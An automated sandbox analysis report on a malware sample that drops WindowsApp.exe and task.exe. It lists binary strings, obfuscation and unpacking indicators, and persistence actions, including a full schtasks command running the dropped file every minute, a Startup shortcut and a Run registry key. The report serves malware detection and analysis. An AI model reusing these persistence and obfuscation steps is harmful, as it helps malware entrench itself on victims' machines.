            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: *Win32_OperatingSystemblib.pdb A source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Drawing.ni.pdbRSDS source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbwA source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: 0C:\Windows\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Core.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Drawing.pdbq source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C142000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C130000.00000004.00000020.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2432794842.000000001C197000.00000004.00000020.00020000.00000000.sdmp, WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Management.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Drawing.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: mscorlib.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdbVa} source: WindowsApp.exe, 00000007.00000002.2431833922.000000001B516000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Core.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: msymbols\dll\mscorlib.pdbpdb` source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: orlib.pdb source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbm source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER2B9E.tmp.dmp.23.dr

            Data Obfuscation

            barindex
            VBScript performs obfuscated calls to suspicious functions
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe", "1", "true");
            .NET source code contains potential unpacker
            Source: 12.2.task.exe.12fce598.5.raw.unpack, Messages.cs.Net Code: _202E_202C_200F_206F_200D_206F_206F_202E_206A_200F_202A_200C_202E_206C_206C_206C_200E_202A_206A_206D_202E_200F_206C_206C_206C_206B_206A_206D_202E_206C_202B_202C_206E_202E_202B_206D_206D_206D_202A_200E_202E System.AppDomain.Load(byte[])
            Source: 12.2.task.exe.13f0000.2.raw.unpack, Messages.cs.Net Code: _202E_202C_200F_206F_200D_206F_206F_202E_206A_200F_202A_200C_202E_206C_206C_206C_200E_202A_206A_206D_202E_200F_206C_206C_206C_206B_206A_206D_202E_206C_202B_202C_206E_202E_202B_206D_206D_206D_202A_200E_202E System.AppDomain.Load(byte[])
            Source: 12.2.task.exe.12f80918.3.raw.unpack, Messages.cs.Net Code: _202E_202C_200F_206F_200D_206F_206F_202E_206A_200F_202A_200C_202E_206C_206C_206C_200E_202A_206A_206D_202E_200F_206C_206C_206C_206B_206A_206D_202E_206C_202B_202C_206E_202E_202B_206D_206D_206D_202A_200E_202E System.AppDomain.Load(byte[])
            Source: 12.2.task.exe.12fa7760.4.raw.unpack, Messages.cs.Net Code: _202E_202C_200F_206F_200D_206F_206F_202E_206A_200F_202A_200C_202E_206C_206C_206C_200E_202A_206A_206D_202E_200F_206C_206C_206C_206B_206A_206D_202E_206C_202B_202C_206E_202E_202B_206D_206D_206D_202A_200E_202E System.AppDomain.Load(byte[])
            Source: 16.2.task.exe.122c9ac0.0.raw.unpack, Messages.cs.Net Code: _202E_202C_200F_206F_200D_206F_206F_202E_206A_200F_202A_200C_202E_206C_206C_206C_200E_202A_206A_206D_202E_200F_206C_206C_206C_206B_206A_206D_202E_206C_202B_202C_206E_202E_202B_206D_206D_206D_202A_200E_202E System.AppDomain.Load(byte[])
            Source: 16.2.task.exe.122f0908.2.raw.unpack, Messages.cs.Net Code: _202E_202C_200F_206F_200D_206F_206F_202E_206A_200F_202A_200C_202E_206C_206C_206C_200E_202A_206A_206D_202E_200F_206C_206C_206C_206B_206A_206D_202E_206C_202B_202C_206E_202E_202B_206D_206D_206D_202A_200E_202E System.AppDomain.Load(byte[])
            Source: 16.2.task.exe.12317740.1.raw.unpack, Messages.cs.Net Code: _202E_202C_200F_206F_200D_206F_206F_202E_206A_200F_202A_200C_202E_206C_206C_206C_200E_202A_206A_206D_202E_200F_206C_206C_206C_206B_206A_206D_202E_206C_202B_202C_206E_202E_202B_206D_206D_206D_202A_200E_202E System.AppDomain.Load(byte[])
            Source: WindowsApp.exe.2.drStatic PE information: section name: dCocB{
            Source: WindowsApp.exe.2.drStatic PE information: section name:
            Source: task.exe.7.drStatic PE information: section name: dCocB{
            Source: task.exe.7.drStatic PE information: section name:
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4E976F pushfd ; ret 7_2_00007FFAAC4E97C1
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4D5926 push ds; iretd 7_2_00007FFAAC4D5929
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4E7483 push ebx; ret 7_2_00007FFAAC4E7484
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4C00BD pushad ; iretd 7_2_00007FFAAC4C00C1
            Source: C:\Users\user\AppData\Roaming\task.exeCode function: 12_2_00BDC92F push rbx; ret 12_2_00BDC931
            Source: C:\Users\user\AppData\Roaming\task.exeCode function: 12_2_00007FFAAC4B3D85 push esp; retf 12_2_00007FFAAC4B3D86
            Source: C:\Users\user\AppData\Roaming\task.exeCode function: 14_2_00007FFAAC4A3D85 push esp; retf 14_2_00007FFAAC4A3D86
            Source: C:\Users\user\AppData\Roaming\task.exeCode function: 15_2_00007FFAAC4D00BD pushad ; iretd 15_2_00007FFAAC4D00C1
            Source: C:\Users\user\AppData\Roaming\task.exeCode function: 15_2_00007FFAAC4D3D85 push esp; retf 15_2_00007FFAAC4D3D86
            Source: C:\Users\user\AppData\Roaming\task.exeCode function: 16_2_00007FFAAC4C00BD pushad ; iretd 16_2_00007FFAAC4C00C1
            Source: C:\Users\user\AppData\Roaming\task.exeCode function: 16_2_00007FFAAC4C3D85 push esp; retf 16_2_00007FFAAC4C3D86
            Source: C:\Users\user\AppData\Roaming\task.exeCode function: 20_2_00007FFAAC4C00BD pushad ; iretd 20_2_00007FFAAC4C00C1
            Source: C:\Users\user\AppData\Roaming\task.exeCode function: 20_2_00007FFAAC4D5926 push ds; iretd 20_2_00007FFAAC4D5929
            Source: C:\Users\user\AppData\Roaming\task.exeCode function: 20_2_00007FFAAC4D7A41 push ecx; iretd 20_2_00007FFAAC4D7A42
            Source: WindowsApp.exe.2.drStatic PE information: section name: dCocB{ entropy: 7.998877154551337
            Source: task.exe.7.drStatic PE information: section name: dCocB{ entropy: 7.998877154551337
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeFile created: C:\Users\user\AppData\Roaming\task.exeJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\WindowsApp.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe"
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\task.lnkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\task.lnkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run taskJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run taskJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\task.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
